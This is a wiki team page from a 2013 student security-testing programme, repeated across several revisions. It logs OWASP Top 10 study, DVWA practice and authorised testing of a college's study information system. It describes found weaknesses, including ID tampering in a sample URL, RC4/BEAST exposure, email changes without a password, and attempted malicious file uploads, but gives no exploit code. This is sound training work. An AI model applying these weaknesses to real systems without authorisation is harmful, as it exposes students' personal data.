** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** Googeled a lot

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** We made the presentation structure together.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T06:04:49Z

Saus: /* Materials (slides etc) */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)'''

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''[http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Final presentation of the projects on the 4 April 2013 at room 316 (video)]'''

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** Googeled a lot

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** We made the presentation structure together.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T06:02:02Z

Saus: /* Materials (slides etc) */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)'''

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
